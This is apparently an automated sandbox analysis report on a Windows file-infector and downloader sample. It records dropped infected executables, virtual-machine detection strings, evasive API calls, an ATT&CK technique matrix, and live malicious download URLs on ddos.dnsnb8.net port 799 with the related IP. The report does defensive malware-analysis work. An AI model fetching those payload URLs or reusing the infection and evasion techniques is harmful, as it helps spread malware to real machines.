    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeSystem file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to behavior
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeFile created: C:\Users\user\AppData\Local\Temp\TJytnf.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile created: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile created: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile created: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 799
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeDropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeJump to dropped file
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_1-1051
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C01718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00C01754h1_2_00C01718
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C029E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose,1_2_00C029E2
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C02B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread,1_2_00C02B8C
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeFile opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\Jump to behavior
    Source: Amcache.hve.1.drBinary or memory string: VMware
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual USB Mouse
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin
    Source: Amcache.hve.1.drBinary or memory string: VMware, Inc.
    Source: TJytnf.exe, 00000001.00000003.1804798033.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981067567.0000000000AED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW-
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1hbin@
    Source: Amcache.hve.1.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
    Source: Amcache.hve.1.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.1.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
    Source: TJytnf.exe, 00000001.00000002.1981067567.0000000000ACB000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000003.1804798033.0000000000AEF000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000003.1804737601.0000000000B2B000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981067567.0000000000AED000.00000004.00000020.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000003.1804648171.0000000000B24000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: Amcache.hve.1.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
    Source: Amcache.hve.1.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
    Source: Amcache.hve.1.drBinary or memory string: vmci.sys
    Source: Amcache.hve.1.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
    Source: Amcache.hve.1.drBinary or memory string: vmci.syshbin`
    Source: Amcache.hve.1.drBinary or memory string: \driver\vmci,\driver\pci
    Source: Amcache.hve.1.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
    Source: Amcache.hve.1.drBinary or memory string: VMware20,1
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Generation Counter
    Source: Amcache.hve.1.drBinary or memory string: NECVMWar VMware SATA CD00
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual disk SCSI Disk Device
    Source: Amcache.hve.1.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
    Source: Amcache.hve.1.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
    Source: Amcache.hve.1.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
    Source: Amcache.hve.1.drBinary or memory string: VMware PCI VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware VMCI Bus Device
    Source: Amcache.hve.1.drBinary or memory string: VMware Virtual RAM
    Source: Amcache.hve.1.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
    Source: Amcache.hve.1.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeAPI call chain: ExitProcess graph end nodegraph_1-1026
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_00740044 mov eax, dword ptr fs:[00000030h]0_2_00740044
    Source: SciTE.exe.1.drBinary or memory string: Ctrl+RightLeftDownUpDecimalMinusMultiplyDivideTabSpaceDeleteEscapeEndInsertEnterHomeForwardBackwardPLAT_WIN1PageDownPageUpMenuWinSciTEACCELSSciTEWindowContentSciTEWindowPLAT_WINNT1toolbar.largecreate.hidden.consolegbkbig5euc-krshift_jisutf-8asciilatin2latin1translation.encodingwindows-1251ScaleFactoriso-8859-5cyrillic1250iso8859-11SciTE_HOMEAppsUseLightThemeSciTE_USERHOMESciTE_HOMEPropertiesScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Themes\PersonalizeEmbeddedRich Text FormatButtonShell_TrayWndUSERPROFILESciTE_HOMEHtmlHelpWHHCTRL.OCX
    Source: C:\Users\user\Desktop\biKy3nZEyJ.exeCode function: 0_2_004035A2 cpuid 0_2_004035A2
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C01718 GetSystemTimeAsFileTime,SHSetValueA,SHGetValueA,__aulldiv,__aulldiv,1_2_00C01718
    Source: C:\Users\user\AppData\Local\Temp\TJytnf.exeCode function: 1_2_00C0139F GetVersionExA,LookupPrivilegeValueA,GetCurrentProcessId,1_2_00C0139F
    Source: Amcache.hve.1.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
    Source: Amcache.hve.1.drBinary or memory string: MsMpEng.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: TJytnf.exe PID: 7356, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: TJytnf.exe PID: 7356, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Masquerading
    11
    Input Capture
    11
    System Time Discovery
    1
    Taint Shared Content
    11
    Input Capture
    1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts2
    Process Injection
    1
    Access Token Manipulation
    LSASS Memory11
    Security Software Discovery
    Remote Desktop Protocol1
    Archive Collected Data
    11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
    DLL Side-Loading
    2
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive2
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
    Obfuscated Files or Information
    NTDS3
    File and Directory Discovery
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
    Software Packing
    LSA Secrets13
    System Information Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    biKy3nZEyJ.exe100%AviraW32/Jadtre.B
    biKy3nZEyJ.exe100%Joe Sandbox ML
    SourceDetectionScannerLabelLink
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%AviraW32/Jadtre.B
    C:\Program Files\7-Zip\Uninstall.exe100%AviraW32/Jadtre.B
    C:\Users\user\AppData\Local\Temp\TJytnf.exe100%AviraTR/Dldr.Small.Z.haljq
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%AviraW32/Jadtre.B
    C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe100%Joe Sandbox ML
    C:\Program Files\7-Zip\Uninstall.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\TJytnf.exe100%Joe Sandbox ML
    C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://www.scintilla.org/scite.rng0%URL Reputationsafe
    http://www.rftp.comJosiah0%URL Reputationsafe
    http://www.activestate.com0%URL Reputationsafe
    http://www.activestate.comHolger0%URL Reputationsafe
    http://upx.sf.net0%URL Reputationsafe
    http://www.rftp.com0%URL Reputationsafe
    http://www.baanboard.comBrendon0%URL Reputationsafe
    https://www.smartsharesystems.com/0%URL Reputationsafe
    http://www.scintilla.org0%URL Reputationsafe
    http://www.spaceblue.comMathias0%URL Reputationsafe
    https://www.smartsharesystems.com/Morten0%URL Reputationsafe
    http://www.develop.com0%URL Reputationsafe
    http://www.lua.org0%URL Reputationsafe
    http://ddos.dnsnb8.net:799/cj//k1.rar100%URL Reputationmalware
    http://www.spaceblue.com0%URL Reputationsafe
    http://www.baanboard.com0%URL Reputationsafe
    http://www.develop.comDeepak0%URL Reputationsafe
    http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE0%Avira URL Cloudsafe
    http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManageru100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarb100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net/E100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.rar100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarA100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k1.rar:100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k2.rar4u100%Avira URL Cloudmalware
    http://ddos.dnsnb8.net:799/cj//k2.rarw100%Avira URL Cloudphishing
    http://ddos.dnsnb8.net:799/cj//k1.rarV100%Avira URL Cloudphishing
    NameIPActiveMaliciousAntivirus DetectionReputation
    ddos.dnsnb8.net
    44.221.84.105
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net:799/cj//k2.rarfalse
      • Avira URL Cloud: malware
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rartrue
      • URL Reputation: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://ddos.dnsnb8.net/ETJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rar:TJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://www.scintilla.org/scite.rngSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.rftp.comJosiahSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarbTJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://www.activestate.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.activestate.comHolgerSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarDownloadManageruTJytnf.exe, 00000001.00000002.1981067567.0000000000B48000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DETJytnf.exe, 00000001.00000003.1795628284.0000000000BA0000.00000004.00001000.00020000.00000000.sdmp, TJytnf.exe, 00000001.00000002.1981472017.0000000000C03000.00000002.00000001.01000000.00000004.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://upx.sf.netAmcache.hve.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.rftp.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.baanboard.comBrendonSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      https://www.smartsharesystems.com/SciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.scintilla.orgSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.spaceblue.comMathiasSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarwTJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      https://www.smartsharesystems.com/MortenSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.develop.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.lua.orgSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rarATJytnf.exe, 00000001.00000002.1981067567.0000000000B05000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://ddos.dnsnb8.net:799/cj//k1.rarVTJytnf.exe, 00000001.00000003.1804648171.0000000000B12000.00000004.00000020.00020000.00000000.sdmptrue
      • Avira URL Cloud: phishing
      unknown
      http://ddos.dnsnb8.net:799/cj//k2.rar4uTJytnf.exe, 00000001.00000002.1981067567.0000000000B24000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: malware
      unknown
      http://www.spaceblue.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.baanboard.comSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      http://www.develop.comDeepakSciTE.exe.1.drfalse
      • URL Reputation: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      44.221.84.105
      ddos.dnsnb8.netUnited States
      14618AMAZON-AESUSfalse
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1480645
      Start date and time:2024-07-24 22:21:27 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 26s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:10
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:biKy3nZEyJ.exe
      renamed because original name is a hash value
      Original Sample Name:98DC44E47B06318EBD73414912CD60F5FF71B3FE172476D353B4DDA39C7DC327.exe
      Detection:MAL
      Classification:mal81.spre.troj.evad.winEXE@5/11@1/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 56%
      • Number of executed functions: 15
      • Number of non-executed functions: 27
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 20.189.173.22
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: biKy3nZEyJ.exe
      TimeTypeDescription
      16:22:51API Interceptor1x Sleep call for process: WerFault.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      44.221.84.105942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k2.rar
      998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      987123[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • ddos.dnsnb8.net:799/cj//k1.rar
      96ee8edc[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exeGet hashmaliciousBdaejec, Oski Stealer, VidarBrowse
      • ddos.dnsnb8.net:799/cj//k1.rar
      942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejec, SalityBrowse
      • ddos.dnsnb8.net:799/cj//k3.rar
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • ddos.dnsnb8.net:799/cj//k3.rar
      94846EDFED07F0DFFAB570F7C0E746E0077012FA5854B6B610552A8CA5A48F74.exeGet hashmaliciousBdaejec, RedLineBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      94E022CC268FEEE9F2A1A08260ECBB9767BFC0383CCABFB12330C30B5EDF4933.exeGet hashmaliciousBdaejec, Clipboard HijackerBrowse
      • ddos.dnsnb8.net:799/cj//k5.rar
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ddos.dnsnb8.net942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      998D503AA5E68830D7F981490108D44DC12F331BD5AD9EA9F207A99E6D06AFBB.exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
      987123[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      96ee8edc[1].exeGet hashmaliciousBdaejec, SmokeLoaderBrowse
      • 44.221.84.105
      962EA3E84B772C84BC0D9495CC00BF547CA80AC1ED34026CB971B6F5EB9DEEC8.exeGet hashmaliciousBdaejec, Oski Stealer, VidarBrowse
      • 44.221.84.105
      942b266052cbd8e8b460173ab630e2afa32d1d494cce2f1473f606f8402cb2f8.exeGet hashmaliciousBdaejec, SalityBrowse
      • 44.221.84.105
      9608e7d593a0671671e3b7e23d1b1fcfe49a5f84da9d2e0c5560d63b091acd83.exeGet hashmaliciousBdaejec, GCleaner, NymaimBrowse
      • 44.221.84.105
      95324A18E2A0AA85A2C5CE30681B4C2D9F703415D3C41916F540F24A5088807B.exeGet hashmaliciousBdaejecBrowse
      • 44.221.84.105
